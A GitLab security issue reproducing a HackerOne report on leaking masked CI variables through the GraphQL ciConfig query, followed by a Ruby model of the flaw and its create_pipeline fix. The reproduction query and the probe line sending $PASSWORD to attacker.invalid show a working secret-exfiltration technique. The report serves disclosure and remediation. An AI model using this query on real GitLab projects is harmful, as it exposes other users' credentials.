GitLab.org / GitLab / Issues / #355738

Backend: Unallowed users can read masked CI variables of Gitlab projects

HackerOne report #1511133 by shells3c on 2022-03-14, assigned to @dcouture:

Report

Summary

External users/users without privilege/guests (depends on project visibility) can access CI variables of a Gitlab project using GraphQL. The table below explains all situations in which a user can access CI variables:

  User type        Public Project   Internal Project   Private Project
  External user    Yes              No                 No
  User             Yes              Yes                No
  Guest            Yes              Yes                Yes

Steps to reproduce
  1. Create a project, then create a CI variable in the project named PASSWORD, disable Protect variable and enable Mask variable
  2. From another account (no role in the project), run the following query in the GraphQL Explorer:
{
  ciConfig(
    projectPath: "dcouture/public_project"
    content: "include: https://[redacted]/$VARIABLE_NAME.yaml"
  ) {
    errors
  }
}
  3. The server at example.com will receive the following request:
GET /[YOUR PASSWORD HERE].yaml HTTP/1.0
Host: [redacted]
Connection: close
Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept: */*
User-Agent: Ruby
What is the current bug behavior?

GraphQL operation getCiConfigData loads all CI variables of the project, including custom ones, in the background

What is the expected correct behavior?

GraphQL operation getCiConfigData shouldn't be able to access the project's custom variables

Output of checks

This bug happens on GitLab.com

Impact

Accessing CI variables, including sensitive masked variables, of Gitlab projects without permission

Proposal

Update Resolvers::Ci::ConfigResolver to authorize using the create_pipeline policy.

Edited Jun 07, 2022 by Avielle Wolfe
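The following Ruby model is an added illustration of the mechanism described in the report and of the fix proposed above; it is not GitLab's code and does not reproduce its resolver. It assumes a toy permission model (role ranks, "developer" as the lowest role that may create a pipeline), an assumed rule that unknown variable names are left unexpanded, and a constructed project with a masked variable. A lint-style resolver that expands project variables into `include:` URLs before fetching them turns the outbound request itself into the leak; gating the resolver on a pipeline-creation permission instead of plain read access stops a guest or external user from triggering that expansion.

```ruby
require 'yaml'

# Added example, not GitLab code: a toy model of a CI-config lint resolver
# that expands project variables into `include:` URLs before fetching them,
# first gated only on project read access (the reported behaviour), then
# gated on a pipeline-creation permission (the proposed fix).

User    = Struct.new(:name, :external, keyword_init: true)
Project = Struct.new(:path, :visibility, :variables, :members, keyword_init: true)

ROLE_RANK = { guest: 10, reporter: 20, developer: 30, maintainer: 40 }.freeze

# Lowest role allowed to create a pipeline in this toy policy (assumption).
MIN_PIPELINE_ROLE = :developer

def role_of(user, project)
  project.members[user.name]
end

# Read access: public projects are readable by everyone, internal ones by
# non-external users, private ones only by members (any role, guest included).
def can_read_project?(user, project)
  return true if role_of(user, project)
  case project.visibility
  when :public   then true
  when :internal then !user.external
  else false
  end
end

def can_create_pipeline?(user, project)
  role = role_of(user, project)
  !role.nil? && ROLE_RANK.fetch(role) >= ROLE_RANK.fetch(MIN_PIPELINE_ROLE)
end

# Expand $NAME and ${NAME}; unknown names are left untouched (assumption).
def expand_variables(str, vars)
  str.gsub(/\$\{(\w+)\}|\$(\w+)/) do
    name = Regexp.last_match(1) || Regexp.last_match(2)
    vars.key?(name) ? vars[name] : Regexp.last_match(0)
  end
end

# Collect the remote include URLs a lint of `content` would fetch,
# with project variables already substituted in, i.e. the value that
# ends up in the path of the outbound HTTP request.
def include_urls(content, vars)
  doc  = YAML.safe_load(content) || {}
  incs = doc['include']
  incs = [incs] unless incs.is_a?(Array)
  incs.map do |inc|
    target = inc.is_a?(Hash) ? inc['remote'] : inc
    target && expand_variables(target.to_s, vars)
  end.compact
end

# authorize_with: :read_project reproduces the report; :create_pipeline is the fix.
def resolve_ci_config(user, project, content, authorize_with:)
  allowed = case authorize_with
            when :read_project    then can_read_project?(user, project)
            when :create_pipeline then can_create_pipeline?(user, project)
            else false
            end
  return { errors: ['not authorized'], fetched: [] } unless allowed

  { errors: [], fetched: include_urls(content, project.variables) }
end

# Constructed sample data: a private project whose guest member should never
# learn the value of PASSWORD (masked in the UI, stored in plaintext server-side).
PROJECT = Project.new(
  path: 'example/private_project', visibility: :private,
  variables: { 'PASSWORD' => 'hunter2' },
  members: { 'guest' => :guest, 'dev' => :developer }
)
GUEST = User.new(name: 'guest', external: false)
DEV   = User.new(name: 'dev', external: false)
PROBE = "include: https://attacker.invalid/$PASSWORD.yaml\n"

if $PROGRAM_NAME == __FILE__
  p resolve_ci_config(GUEST, PROJECT, PROBE, authorize_with: :read_project)
  p resolve_ci_config(GUEST, PROJECT, PROBE, authorize_with: :create_pipeline)
  p resolve_ci_config(DEV, PROJECT, PROBE, authorize_with: :create_pipeline)
end
```

With read-access gating the guest's probe resolves to `https://attacker.invalid/hunter2.yaml`, which is exactly the URL the lint would then fetch, handing the masked value to the attacker's server. With pipeline-creation gating the same guest gets `not authorized` and nothing is expanded, while a developer (who could already see the value through a job) still gets a result.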